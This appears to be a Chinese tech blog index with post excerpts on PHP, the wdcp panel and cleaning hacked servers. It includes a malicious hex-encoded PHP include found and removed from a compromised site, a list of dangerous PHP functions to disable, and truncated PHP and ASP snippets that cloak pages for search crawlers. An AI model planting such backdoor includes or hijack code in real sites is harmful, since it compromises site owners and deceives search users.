袁来如此的工作笔记
竹杖芒鞋轻胜马,谁怕? 一蓑烟雨任平生。

Linux/PHP:

停止php代码执行

719浏览量
停止php代码执行有两个函数是die()和exit();通常与错误管理一起使用(严格说来,它们是语言构造而不是函数,但是谁在意这些呢)。当在脚本中调用 die()和exit()时,将会终止整个脚本。它们都可用于阻止脚本继续执行,而使得某些重要的操作(如建立一条数据库连接)不会发生。你还可以给 die()和exit()传递一个将在浏览器中打印出来的字符串。

PHP用户登录与退出

732浏览量
登录页面login.html 负责收集用户填写的登录信息。<fieldset> <legend>用户登录</legend> <form name="LoginForm" method="post" action="login.php" onSubmit="return InputCheck(this)"> <

wdcp隐藏控制面板的方法

703浏览量
(1)wdcp的后台,默认端口,是8080,可以修改为其它端口,可以限制IP地址的访问,也可以限制域名的访问做了这些限制与设置后,已相对安全了,也一般没人知道和能访问你的后台了但有一些情况,就是搜索引擎里,有些把这个后台的地址也给收录了,这样还是把这个后台的地址给爆露了那,有没一个比较绝对的安全限制方法,答案是有的,如下说的就是(2)怎么实现,很简单在后台限制域名里,绑定一个不存在或没做解析的域名,比如admin.wdcp.cn因为这个域名不存在或没解析,所以没有人知道这个域名的存在,除了你自己

WDCP控制面板的常用liunx命令集

676浏览量
强制修改mysql的root密码,在忘记mysql密码时有用sh /www/wdlinux/tools/mysql_root_chg.shftp配置文件检查,在FTP不能连接或登录时有用sh /www/wdlinux/tools/pureftp_conf_check.shwdcp权限检查,在wdcp后台不正常或部分功能无法使用时有用sh /www/wdlinux/tools/wdcp_perm_check.shwdcp数据库无法连接的修复,如登录后台提示”无法连接mysql,请检查mysql是否

搜索引擎劫持INCLUDE(pack('H*'

1317浏览量
在php脚本中加入 echo 语句逐步缩小范围,最终发现问题由下面一条语句引起INCLUDE(pack('H*','2f7661722f746d702f2e53595344554d502f2e576830416d492e434f5245'));上面的语句引入了 /var/tmp/.SYSDUMP/.Wh0AmI.CORE 脚本。删除该语句后问题解决。搜索 引擎劫持解决。但是另外在uc_client/control/class.php可以找到<?php $mt

linux上php木马、后门查杀总结

641浏览量
linux上php木马、后门查杀总结  经过联系断续一个月的对抗,网站被攻击、挂马、做SEO黑帽的问题终于告一段落,现在总结下经验。Web Server(Nginx为例)1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:if ($request_filename ~* (.*)\.php) {set $php_url $1;}if

服务器目录禁止代码执行

612浏览量
在配置前需要确认你的空间是否支持.htaccess和rewrite,该方法基于.htaccess文件中使用rewrite来达到禁止指定脚本的运行效果。RewriteEngine on  RewriteCond % !^$ RewriteRule uploads/(.*).(php)$ – [F] RewriteRule data/(.*).(php)$ – [F] RewriteR

PHP禁用危险函数

720浏览量
PHP配置禁用危险函数:eval,proc_terminate禁用危险函数:phpinfo,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter禁用危险函数:ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocke禁用危

php百度快照劫持代码

698浏览量
什么是百度快照劫持?就是百度搜索你的网站的时候,域名是你的,标题和快照内容全部被替换成了其他。但是直接打开网站查找源代码里却没有变化。//判断是否为百度蜘蛛,然后进行内容劫持 if(stripos($_SERVER ["HTTP_USER_AGENT"],"baidu")>-1){    $html=file_get_contents('http://www.xxx.com/'); &nb

百度快照内容劫持代码

601浏览量
<% function Getbot() dim s_agent GetBot="" s_agent=Request.ServerVariables("HTTP_USER_AGENT") if instr(1,s_agent,"googlebot",1) > 0 then GetBot="google" end if i